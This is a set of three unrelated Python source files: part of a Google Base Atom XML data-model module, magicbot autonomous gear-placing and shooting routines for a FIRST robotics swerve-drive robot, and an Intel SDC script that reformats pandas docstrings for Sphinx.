value_type: str (optional) The type of data in the vlaue, Examples: text
float
"""
new_attribute = ItemAttribute(name, text=value,
text_type=value_type)
self.item_attributes.append(new_attribute)
def SetItemAttribute(self, name, value):
"""Changes an existing item attribute's value."""
for attrib in self.item_attributes:
if attrib.name == name:
attrib.text = value
return
def RemoveItemAttribute(self, name):
"""Deletes the first extension element which matches name.
Deletes the first extension element which matches name.
"""
for i in xrange(len(self.item_attributes)):
if self.item_attributes[i].name == name:
del self.item_attributes[i]
return
# We need to overwrite _ConvertElementTreeToMember to add special logic to
# convert custom attributes to members
def _ConvertElementTreeToMember(self, child_tree):
# Find the element's tag in this class's list of child members
if self.__class__._children.has_key(child_tree.tag):
member_name = self.__class__._children[child_tree.tag][0]
member_class = self.__class__._children[child_tree.tag][1]
# If the class member is supposed to contain a list, make sure the
# matching member is set to a list, then append the new member
# instance to the list.
if isinstance(member_class, list):
if getattr(self, member_name) is None:
setattr(self, member_name, [])
getattr(self, member_name).append(atom._CreateClassFromElementTree(
member_class[0], child_tree))
else:
setattr(self, member_name,
atom._CreateClassFromElementTree(member_class, child_tree))
elif child_tree.tag.find('{%s}' % GBASE_NAMESPACE) == 0:
# If this is in the gbase namespace, make it into an extension element.
name = child_tree.tag[child_tree.tag.index('}')+1:]
value = child_tree.text
if child_tree.attrib.has_key('type'):
value_type = child_tree.attrib['type']
else:
value_type = None
self.AddItemAttribute(name, value, value_type)
else:
ExtensionContainer._ConvertElementTreeToMember(self, child_tree)
# We need to overwtite _AddMembersToElementTree to add special logic to
# convert custom members to XML nodes.
def _AddMembersToElementTree(self, tree):
# Convert the members of this class which are XML child nodes.
# This uses the class's _children dictionary to find the members which
# should become XML child nodes.
member_node_names = [values[0] for tag, values in
self.__class__._children.iteritems()]
for member_name in member_node_names:
member = getattr(self, member_name)
if member is None:
pass
elif isinstance(member, list):
for instance in member:
instance._BecomeChildElement(tree)
else:
member._BecomeChildElement(tree)
# Convert the members of this class which are XML attributes.
for xml_attribute, member_name in self.__class__._attributes.iteritems():
member = getattr(self, member_name)
if member is not None:
tree.attrib[xml_attribute] = member
# Convert all special custom item attributes to nodes
for attribute in self.item_attributes:
attribute._BecomeChildElement(tree)
# Lastly, call the ExtensionContainers's _AddMembersToElementTree to
# convert any extension attributes.
atom.ExtensionContainer._AddMembersToElementTree(self, tree)
class ItemAttribute(atom.Text):
"""An optional or user defined attribute for a GBase item.
Google Base allows items to have custom attribute child nodes. These nodes
have contents and a type attribute which tells Google Base whether the
contents are text, a float value with units, etc. The Atom text class has
the same structure, so this class inherits from Text.
"""
_namespace = GBASE_NAMESPACE
_children = atom.Text._children.copy()
_attributes = atom.Text._attributes.copy()
def __init__(self, name, text_type=None, text=None,
extension_elements=None, extension_attributes=None):
"""Constructor for a GBase item attribute
Args:
name: str The name of the attribute. Examples include
price, color, make, model, pages, salary, etc.
text_type: str (optional) The type associated with the text contents
text: str (optional) The text data in the this element
extension_elements: list (optional) A list of ExtensionElement
instances
extension_attributes: dict (optional) A dictionary of attribute
value string pairs
"""
self.name = name
self.type = text_type
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def _BecomeChildElement(self, tree):
new_child = ElementTree.Element('')
tree.append(new_child)
new_child.tag = '{%s}%s' % (self.__class__._namespace,
self.name)
self._AddMembersToElementTree(new_child)
def _ToElementTree(self):
new_tree = ElementTree.Element('{%s}%s' % (self.__class__._namespace,
self.name))
self._AddMembersToElementTree(new_tree)
return new_tree
def ItemAttributeFromString(xml_string):
element_tree = ElementTree.fromstring(xml_string)
return _ItemAttributeFromElementTree(element_tree)
def _ItemAttributeFromElementTree(element_tree):
if element_tree.tag.find(GBASE_TEMPLATE % '') == 0:
to_return = ItemAttribute('')
to_return._HarvestElementTree(element_tree)
to_return.name = element_tree.tag[element_tree.tag.index('}')+1:]
if to_return.name and to_return.name != '':
return to_return
return None
class Label(atom.AtomBase):
"""The Google Base label element"""
_tag = 'label'
_namespace = GBASE_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, text=None, extension_elements=None,
extension_attributes=None):
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def LabelFromString(xml_string):
return atom.CreateClassFromXMLString(Label, xml_string)
class ItemType(atom.Text):
"""The Google Base item_type element"""
_tag = 'item_type'
_namespace = GBASE_NAMESPACE
_children = atom.Text._children.copy()
_attributes = atom.Text._attributes.copy()
def __init__(self, text=None, extension_elements=None,
text_type=None, extension_attributes=None):
self.text = text
self.type = text_type
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def ItemTypeFromString(xml_string):
return atom.CreateClassFromXMLString(ItemType, xml_string)
class MetaItemType(ItemType):
"""The Google Base item_type element"""
_tag = 'item_type'
_namespace = GMETA_NAMESPACE
_children = ItemType._children.copy()
_attributes = ItemType._attributes.copy()
def MetaItemTypeFromString(xml_string):
return atom.CreateClassFromXMLString(MetaItemType, xml_string)
class Value(atom.AtomBase):
"""Metadata about common values for a given attribute
A value is a child of an attribute which comes from the attributes feed.
The value's text is a commonly used value paired with an attribute name
and the value's count tells how often this value appears for the given
attribute in the search results.
"""
_tag = 'value'
_namespace = GMETA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['count'] = 'count'
def __init__(self, count=None, text=None, extension_elements=None,
extension_attributes=None):
"""Constructor for Attribute metadata element
Args:
count: str (optional) The number of times the value in text is given
for the parent attribute.
text: str (optional) The value which appears in the search results.
extension_elements: list (optional) A list of ExtensionElement
instances
extension_attributes: dict (optional) A dictionary of attribute value
string pairs
"""
self.count = count
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def ValueFromString(xml_string):
return atom.CreateClassFromXMLString(Value, xml_string)
class Attribute(atom.Text):
"""Metadata about an attribute from the attributes feed
An entry from the attributes feed contains a list of attributes. Each
attribute describes the attribute's type and count of the items which
use the attribute.
"""
_tag = 'attribute'
_namespace = GMETA_NAMESPACE
_children = atom.Text._children.copy()
_attributes = atom.Text._attributes.copy()
_children['{%s}value' % GMETA_NAMESPACE] = ('value', [Value])
_attributes['count'] = 'count'
_attributes['name'] = 'name'
def __init__(self, name=None, attribute_type=None, count=None, value=None,
text=None, extension_elements=None, extension_attributes=None):
"""Constructor for Attribute metadata element
Args:
name: str (optional) The name of the attribute
attribute_type: str (optional) The type for the attribute. Examples:
test, float, etc.
count: str (optional) The number of times this attribute appears in
the query results.
value: list (optional) The values which are often used for this
attirbute.
text: str (optional) The text contents of the XML for this attribute.
extension_elements: list (optional) A list of ExtensionElement
instances
extension_attributes: dict (optional) A dictionary of attribute value
string pairs
"""
self.name = name
self.type = attribute_type
self.count = count
self.value = value or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def AttributeFromString(xml_string):
return atom.CreateClassFromXMLString(Attribute, xml_string)
class Attributes(atom.AtomBase):
"""A collection of Google Base metadata attributes"""
_tag = 'attributes'
_namespace = GMETA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])
def __init__(self, attribute=None, extension_elements=None,
extension_attributes=None, text=None):
self.attribute = attribute or []
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
self.text = text
class GBaseItem(ItemAttributeContainer, gdata.BatchEntry):
"""An Google Base flavor of an Atom Entry.
Google Base items have required attributes, recommended attributes, and user
defined attributes. The required attributes are stored in this class as
members, and other attributes are stored as extension elements. You can
access the recommended and user defined attributes by using
AddItemAttribute, SetItemAttribute, FindItemAttribute, and
RemoveItemAttribute.
The Base Item
"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.BatchEntry._children.copy()
_attributes = gdata.BatchEntry._attributes.copy()
_children['{%s}label' % GBASE_NAMESPACE] = ('label', [Label])
_children['{%s}item_type' % GBASE_NAMESPACE] = ('item_type', ItemType)
def __init__(self, author=None, category=None, content=None,
contributor=None, atom_id=None, link=None, published=None, rights=None,
source=None, summary=None, title=None, updated=None, control=None,
label=None, item_type=None, item_attributes=None,
batch_operation=None, batch_id=None, batch_status=None,
text=None, extension_elements=None, extension_attributes=None):
self.author = author or []
self.category = category or []
self.content = content
self.contributor = contributor or []
self.id = atom_id
self.link = link or []
self.published = published
self.rights = rights
self.source = source
self.summary = summary
self.title = title
self.updated = updated
self.control = control
self.label = label or []
self.item_type = item_type
self.item_attributes = item_attributes or []
self.batch_operation = batch_operation
self.batch_id = batch_id
self.batch_status = batch_status
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def GBaseItemFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseItem, xml_string)
class GBaseSnippet(GBaseItem):
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = GBaseItem._children.copy()
_attributes = GBaseItem._attributes.copy()
def GBaseSnippetFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseSnippet, xml_string)
class GBaseAttributeEntry(gdata.GDataEntry):
"""An Atom Entry from the attributes feed"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])
def __init__(self, author=None, category=None, content=None,
contributor=None, atom_id=None, link=None, published=None, rights=None,
source=None, summary=None, title=None, updated=None, label=None,
attribute=None, control=None,
text=None, extension_elements=None, extension_attributes=None):
self.author = author or []
self.category = category or []
self.content = content
self.contributor = contributor or []
self.id = atom_id
self.link = link or []
self.published = published
self.rights = rights
self.source = source
self.summary = summary
self.control = control
self.title = title
self.updated = updated
self.label = label or []
self.attribute = attribute or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def GBaseAttributeEntryFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseAttributeEntry, xml_string)
class GBaseItemTypeEntry(gdata.GDataEntry):
"""An Atom entry from the item types feed
These entries contain a list of attributes which are stored in one
XML node called attributes. This class simplifies the data structure
by treating attributes as a list of attribute instances.
Note that the item_type for an item type entry is in the Google Base meta
namespace as opposed to item_types encountered in other feeds.
"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}attributes' % GMETA_NAMESPACE] = ('attributes', Attributes)
_children['{%s}attribute' % GMETA_NAMESPACE] = ('attribute', [Attribute])
_children['{%s}item_type' % GMETA_NAMESPACE] = ('item_type', MetaItemType)
def __init__(self, author=None, category=None, content=None,
contributor=None, atom_id=None, link=None, published=None, rights=None,
source=None, summary=None, title=None, updated=None, label=None,
item_type=None, control=None, attribute=None, attributes=None,
text=None, extension_elements=None, extension_attributes=None):
self.author = author or []
self.category = category or []
self.content = content
self.contributor = contributor or []
self.id = atom_id
self.link = link or []
self.published = published
self.rights = rights
self.source = source
self.summary = summary
self.title = title
self.updated = updated
self.control = control
self.label = label or []
self.item_type = item_type
self.attributes = attributes
self.attribute = attribute or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
def GBaseItemTypeEntryFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseItemTypeEntry, xml_string)
class GBaseItemFeed(gdata.BatchFeed):
"""A feed containing Google Base Items"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.BatchFeed._children.copy()
_attributes = gdata.BatchFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseItem])
def GBaseItemFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseItemFeed, xml_string)
class GBaseSnippetFeed(gdata.GDataFeed):
"""A feed containing Google Base Snippets"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseSnippet])
def GBaseSnippetFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseSnippetFeed, xml_string)
class GBaseAttributesFeed(gdata.GDataFeed):
"""A feed containing Google Base Attributes
A query sent to the attributes feed will return a feed of
attributes which are present in the items that match the
query.
"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[GBaseAttributeEntry])
def GBaseAttributesFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseAttributesFeed, xml_string)
class GBaseLocalesFeed(gdata.GDataFeed):
"""The locales feed from Google Base.
This read-only feed defines the permitted locales for Google Base. The
locale value identifies the language, currency, and date formats used in a
feed.
"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
def GBaseLocalesFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseLocalesFeed, xml_string)
class GBaseItemTypesFeed(gdata.GDataFeed):
"""A feed from the Google Base item types feed"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GBaseItemTypeEntry])
def GBaseItemTypesFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GBaseItemTypesFeed, xml_string)
| |
from magicbot.state_machine import state, timed_state
from .base_auto import VictisAuto
from components import swervedrive, gearpicker, shooter
from controllers.pos_controller import XPosController, YPosController
from controllers.angle_controller import AngleController, MovingAngleController
from controllers.position_history import PositionHistory
from controllers.position_tracker import PositionTracker
import wpilib
from networktables import NetworkTable
from magicbot.magic_tunable import tunable
class RightSideGearPlace(VictisAuto):
"""
Place robot 15in from string 90deg to string."""
MODE_NAME = 'Right side gear place'
DEFAULT = False
DIRECTION = 1
drive = swervedrive.SwerveDrive
gear_picker = gearpicker.GearPicker
x_ctrl = XPosController
y_ctrl = YPosController
angle_ctrl = AngleController
moving_angle_ctrl = MovingAngleController
tracker = PositionTracker
out_distance = tunable(7.5)
rotate_to_angle = tunable(-60)
wiggle_value = tunable(-5)
to_gear_distance = tunable(2)
drive_back_distance = tunable(-2.7)
drive_past_line_distance = tunable(5)
@timed_state(duration=7, next_state='failed', first=True)
def drive_out(self, initial_call):
# Go forward
if initial_call:
self.drive.field_centric = False
self.gear_picker._picker_state = 2
self.angle_ctrl.reset_angle()
self.tracker.enable()
self.y_ctrl.move_to(self.out_distance)
self.moving_angle_ctrl.align_to(0)
if self.y_ctrl.is_at_location():
self.next_state('rotate')
@timed_state(duration=5, next_state='failed')
def rotate(self):
self.angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
if self.angle_ctrl.is_aligned():
self.next_state('drive_to_gear')
@timed_state(duration=0.5, next_state='drive_to_gear')
def check_rotate(self):
if not self.angle_ctrl.is_aligned_to(self.rotate_to_angle * self.DIRECTION):
self.next_state('rotate')
@timed_state(duration=3, next_state='rcw_with_gear')
def drive_to_gear(self, initial_call):
if initial_call:
self.tracker.reset()
self.y_ctrl.move_to(self.to_gear_distance)
self.moving_angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
if self.y_ctrl.is_at_location():
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@timed_state(duration=1, next_state='try_release')
def rcw_with_gear(self):
self.y_ctrl.move_to(self.to_gear_distance)
self.drive.set_raw_rcw(0.4 * self.DIRECTION)
if self.y_ctrl.is_at_location():
self.drive.set_raw_rcw(0.0)
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@state
def try_release(self):
self.drive.debug()
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@timed_state(duration=5, next_state='failed')
def drive_back(self, initial_call):
if initial_call:
self.tracker.reset()
self.y_ctrl.move_to(self.drive_back_distance)
self.moving_angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
if self.y_ctrl.is_at_location():
self.next_state('rotate_back')
@state
def rotate_back(self):
"""
IF MODIFIED: Function in ShootLeftGearPlace must be modified too"""
self.angle_ctrl.align_to(0)
if self.angle_ctrl.is_aligned():
self.next_state('drive_past_line')
@state
def drive_past_line(self, initial_call):
if initial_call:
self.tracker.reset()
self.moving_angle_ctrl.align_to(0)
self.y_ctrl.move_to(self.drive_past_line_distance)
if self.y_ctrl.is_at_location():
self.next_state('finish')
class LeftSideGearPlace(RightSideGearPlace):
'Place robot 15in from string 90deg to string'
MODE_NAME = 'Left side gear place'
DEFAULT = False
DIRECTION = -1
class ShootLeftSideGearPlace(RightSideGearPlace):
'Place robot 15in from string 90deg to string'
MODE_NAME = 'Shoot left side gear place'
DEFAULT = False
DIRECTION = -1
drive_back_distance = tunable(-4)
at_tower_angle = tunable(40)
shooter = shooter.Shooter
x_ctrl = XPosController
@state
def rotate_back(self):
"""
IF MODIFIED: Function in RightGearPlace must be modified too"""
self.angle_ctrl.align_to(self.at_tower_angle)
if self.angle_ctrl.is_aligned():
self.drive.set_raw_rcw(0.0)
self.next_state('sit_and_shoot')
self.shooter.shoot()
@timed_state(duration=8, next_state='finish')
def sit_and_shoot(self):
self.shooter.shoot()
class MiddleGearPlace(VictisAuto):
MODE_NAME = 'Middle Gear Place'
DEFAULT = False
drive = swervedrive.SwerveDrive
gear_picker = gearpicker.GearPicker
x_ctrl = XPosController
y_ctrl = YPosController
angle_ctrl = AngleController
moving_angle_ctrl = MovingAngleController
tracker = PositionTracker
out_distance = tunable(6)
#drive_back_distance = tunable(-3)
strafe_distance = tunable(8)
drive_past_line_distance = tunable(8)
@timed_state(duration=4, next_state='rcw_with_gear', first=True)
def drive_out(self, initial_call):
# Go forward
if initial_call:
self.drive.field_centric = False
self.gear_picker._picker_state = 2
self.angle_ctrl.reset_angle()
self.tracker.enable()
self.y_ctrl.move_to(self.out_distance)
self.moving_angle_ctrl.align_to(0)
if self.y_ctrl.is_at_location():
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@timed_state(duration=1, next_state='try_release')
def rcw_with_gear(self):
self.y_ctrl.move_to(self.out_distance)
#self.drive.set_raw_rcw(0.4)
if self.y_ctrl.is_at_location():
self.drive.set_raw_rcw(0.0)
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@state
def try_release(self):
self.drive.debug()
self.gear_picker._picker_state = 1
self.next_state('drive_back')
@timed_state(duration=5, next_state='failed')
def drive_back(self, initial_call):
if initial_call:
self.tracker.reset()
self.y_ctrl.move_to(self.drive_back_distance)
self.moving_angle_ctrl.align_to(0)
if self.y_ctrl.is_at_location():
self.next_state('finish')
"""
@timed_state(duration=6, next_state='failed')
def strafe_distance(self, initial_call):
if initial_call:
self.tracker.reset()
self.x_ctrl.move_to(self.drive_back_distance)
self.moving_angle_ctrl.align_to(0)
if self.x_ctrl.is_at_location():
self.next_state('drive_past_line')
@timed_state(duration=6, next_state='failed')
def drive_past_line(self, initial_call):
if initial_call:
self.tracker.reset()
self.y_ctrl.move_to(self.drive_past_line_distance)
self.moving_angle_ctrl.align_to(0)
if self.y_ctrl.is_at_location():
self.next_state('finish')
"""
class ShootMiddleGearPlace(MiddleGearPlace):
MODE_NAME = 'Shoot middle Gear Place'
DEFAULT = False
drive = swervedrive.SwerveDrive
gear_picker = gearpicker.GearPicker
shooter = shooter.Shooter
x_ctrl = XPosController
y_ctrl = YPosController
angle_ctrl = AngleController
moving_angle_ctrl = MovingAngleController
drive_back_distance = tunable(-3)
strafe_tower_distance = tunable(-4)
at_tower_angle = tunable(55)
@timed_state(duration=5, next_state='failed')
def drive_back(self, initial_call):
if initial_call:
self.tracker.reset()
self.y_ctrl.move_to(self.drive_back_distance)
self.moving_angle_ctrl.align_to(0)
if self.y_ctrl.is_at_location():
self.next_state('strafe_tower')
@timed_state(duration=6, next_state='failed')
def strafe_tower(self, initial_call):
if initial_call:
self.tracker.reset()
self.x_ctrl.move_to(self.strafe_tower_distance)
self.moving_angle_ctrl.align_to(0)
self.shooter.force_spin()
if self.x_ctrl.is_at_location():
self.next_state('align_to_tower')
@timed_state(duration=5, next_state='failed')
def align_to_tower(self):
self.angle_ctrl.align_to(self.at_tower_angle)
self.shooter.force_spin()
if self.angle_ctrl.is_aligned():
self.drive.set_raw_rcw(0.0)
self.next_state('check_angle')
self.shooter.force_spin()
@timed_state(duration=0.5, next_state='sit_and_shoot')
def check_angle(self):
if not self.angle_ctrl.is_aligned_to(self.at_tower_angle):
self.next_state('align_to_tower')
@timed_state(duration=8, next_state='finish')
def sit_and_shoot(self):
self.drive.debug(debug_modules=True)
self.shooter.force_spin()
self.shooter.force_feed()
| |
# -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
import pandas
from sdc_object_utils import init_pandas_structure, init_sdc_structure, init_pandas_sdc_dict
from sdc_object_utils import get_sdc_object_by_pandas_name, get_obj
from sdc_object_utils import get_class_methods, get_class_attributes, get_fully_qualified_name
from sdc_doc_utils import is_sdc_user_guide_header, get_indent, reindent, get_short_description
from sdc_doc_utils import split_in_sections, get_docstring, create_heading_str, cut_sdc_dev_guide
import os
APIREF_TEMPLATE_FNAMES = [
'./_templates/_api_ref.pandas.series_templ.rst',
'./_templates/_api_ref.pandas.dataframe_templ.rst',
'./_templates/_api_ref.pandas.window_templ.rst',
]
APIREF_REL_PATH = './_api_ref/'
def reformat(text):
"""
Wrapper function that includes series of transformations of the ``text`` to fix Pandas docstrings which
cause Sphinx to generate warnings.
:param text: Original text with warnings
:return: Modified text that fixes warnings
"""
text = reformat_replace_star_list_with_dash_list(text) # Must be called before :func:`reformat_asterisks`
text = reformat_asterisks(text) # Fix for * and ** symbols
text = reformat_explicit_markup(text) # Fix for explicit markup without a blank line
text = reformat_bullet_list(text) # Fix bullet list indentation issues
text = reformat_remove_unresolved_references(text) # Fix unresolved references after removal of References sections
return reformat_remove_multiple_blank_lines(text)
def reformat_remove_unresolved_references(text):
"""
Fixes unresolved references after removing References sections.
Searches for pattern [numeric]_ in the text and removes it. Intel SDC references do not use [numeric]_ pattern
:param text: Original text
:return: Reformatted text
"""
new_text = ''
while len(text) > 0:
idx = text.find('[')
if idx >= 0:
new_text += text[0:idx]
idx1 = idx+1
while idx1 < len(text) and text[idx1].isnumeric():
# Iterating through numeric characters
idx1 += 1
if idx1+1 < len(text):
# There are at least two more symbols after numeric ones in the text
if text[idx1:idx1+2] != ']_':
new_text += text[idx:idx1+2]
if idx1+2 < len(text):
text = text[idx1+2:] # Remove reference
else:
text = ''
else:
new_text += text[idx:]
text = ''
else:
new_text += text
text = ''
return new_text
def reformat_replace_star_list_with_dash_list(text):
"""
Replaces bullet lists starting with `*` with the lists starting with `-`
:param text: Original text
:return: New text without `*` bullet lists
"""
lines = text.split('\n')
new_text = ''
for line in lines:
if line.strip().startswith('* '):
line = line.replace('* ', '- ', 1)
new_text += line + '\n'
return new_text
def reformat_remove_multiple_blank_lines(text):
"""
Removes redundant blank lines
After multiple passes of the text reformatting there could be redundant blank lines between sections.
This pass is intended for removal of consecutive blank lines and keeping just one blank line between sections
:param text: Original text
:return: Text with removed redundant blank lines
"""
len_changed = True
while len_changed:
new_text = text.replace('\n\n\n', '\n\n')
len_changed = len(new_text) < len(text)
text = new_text
return new_text
def reformat_bullet_list(text):
lines = text.split('\n')
new_text = ''
bullet_indent = -1
while len(lines) > 0:
line = lines[0]
if line.strip().startswith('- '):
# Here if met new bullet
bullet_indent = get_indent(line) # We need to know indent to identify multi-line bullets
new_text += line + '\n'
elif line.strip() == '':
bullet_indent = -1 # We finished parsing multi-line bullet
new_text += '\n'
else:
if bullet_indent >= 0:
# Here if we're parsing multi-line bullet
new_text += reindent(line, bullet_indent + 4) + '\n'
else:
# Here if we are not in bullet list
new_text += line + '\n'
lines.pop(0)
return new_text
def reformat_explicit_markup(text):
"""
Fixes Pandas docstring warning about explicit markup not followed by a blank line.
Parses the text and finds ``'.. '`` strings by adding a blank line next after.
:param text: Original text with warnings
:return: Modified text that fixes warnings
"""
lines = text.split('\n')
new_text = ''
while len(lines) > 0:
line = lines[0]
if line.strip().startswith('.. versionchanged') or line.strip().startswith('.. versionadded') or \
line.strip().startswith('.. deprecated') or line.strip().startswith('.. _'):
new_text += line + '\n'
# Here if found explicit markup
if len(lines) > 1:
# Here if there is at least one line after explicit markup
if lines[1].strip != '':
# Here if there is no empty line after explicit markup. Add new line then
new_text += '\n'
lines.pop(0)
elif line.strip().startswith('.. note') or line.strip().startswith('.. warning'):
new_text += line.strip() + '\n'
if len(lines) > 1:
# Here if there is at least one line after explicit markup
if lines[1].strip() == '':
# Here if there is empty line after explicit markup. Remove new line then
lines.pop(1)
elif line.strip().startswith('.. ['):
new_text += '\n' # Remove references
else:
new_text += line + '\n'
lines.pop(0)
return new_text
def reformat_asterisks(text):
"""
Fixes Pandas docstring warning about using * and ** without ending \* and \*\*.
The fix distinguishes single * and ** by adding \\ to them. No changes for *italic* and **bold** usages.
:param text: Original text with warnings
:return: Modified text that fixes warnings
"""
lines = text.split('\n')
new_text = ''
for line in lines:
idx = 0 # Starting parsing position within the ``line``
while idx < len(line): # Parsing until end of string reached
idx1 = line.find('*', idx)
if idx1 >= idx:
# There is at least one asterisk in the line
idx2 = line.find('*', idx1+1)
if idx2 == -1:
# Only one single asterisk in the line - Reformat to `\*`
line = line.replace('*', '\\*')
idx = len(line) # Parsed the line. Go to another line
elif idx2 == idx1+1:
# First double asterisk met in the line
idx2 = line.find('**', idx1+2)
if idx2 == -1:
# Only one double asterisk in the line Reformat to `\*\*`. But there could be more asterisks
line = line.replace('**', '\\*\\*')
idx = idx1+4
else:
# At least two double asterisks in the line
idx = idx2+2 # Deal with remaining asterisks on the next ``while`` loop iteration
else:
# There is another asterisk apart from the first asterisk
if idx2+1 < len(line):
# There is at least one more symbol in the line after second asterisk
if line[idx2+1] == '*':
# Situation when double asterisk is met after the first single asterisk - Reformat to `\*`
line = line.replace('*', '\\*', 1) # Replace the first single asterisk
idx = idx2 # Handle double asterisk on the next ``while`` iteration
else:
# Two asterisks met in the line to italize characters between them
idx = idx2+1
else:
# Second asterisk was the last symbol in the line
idx = len(line)
else:
# No asterisks in the line
idx = len(line)
new_text += line + '\n'
return new_text
def reformat_pandas_params(title, text):
"""
Re-formats ``text`` written in NumPy style documenting Parameters, Returns, Raises sections into
explicit `:<param>:` style.
Algorithm searches for the pattern:
`<alpha_numeric_value> : <text>`
`<text continued with indent>`
`<text continued with indent>`
Reformat to the following:
`:<alpha_numeric_value>:`
`<text>`
`<text continued with indent>`
`<text continued with indent>`
:param title:
:param text:
:return: Reformatted text
"""
# Internal function. Returns correct markup for :param <param>:, :return:, and :raises <exception>:
def _get_param_text(title, param):
title = title.strip()
if title == 'Parameters':
return ':param ' + param + ':'
elif title == 'Return' or title == 'Returns':
return ':return:'
elif title == 'Raises':
return ':raises:'
# Internal function. Returns correct markup for Parameters section
def _reformat_parameters(title, text):
lines = text.split('\n')
new_text = ''
if len(lines) == 0:
return new_text
indent = get_indent(text)
param = ''
description = ''
while len(lines) > 0:
line = lines[0]
line = line.strip()
idx = line.find(' : ')
if idx >= 0 & line[0:idx].isalnum():
# Check if previous parameter existed. If so, need to add it to reformatted text
if param != '':
new_text += _get_param_text(title, param) + '\n' + reindent(description, indent+4) + '\n'
# Found parameter. Extract the description (can be multi-line)
param = line[0:idx]
description = line[idx+3:] + '\n'
lines.pop(0)
else:
# There is no parameter description starting in this line.
# Check if it is continuation of parameter description from previous lines
if param != '':
# It is continuation of multi-line parameter description
description += reindent(line, indent+4) + '\n'
else:
# This is not the description of parameter. Copy as is
new_text += reindent(line, indent) + '\n'
lines.pop(0)
if param != '' and description != '':
new_text += _get_param_text(title, param) + '\n' + reindent(description, indent+4) + '\n'
return new_text
# Internal function. Returns correct markup for Raises section
def _reformat_raises(title, text):
lines = text.split('\n')
new_text = ''
if len(lines) == 0:
return new_text
indent = get_indent(text)
param = ''
description = ''
while len(lines) > 0:
line = lines[0]
line = line.strip()
# Check if it is continuation of parameter description from previous lines
if param != '':
# It is continuation of multi-line parameter description
description += reindent(line, indent + 8) + '\n'
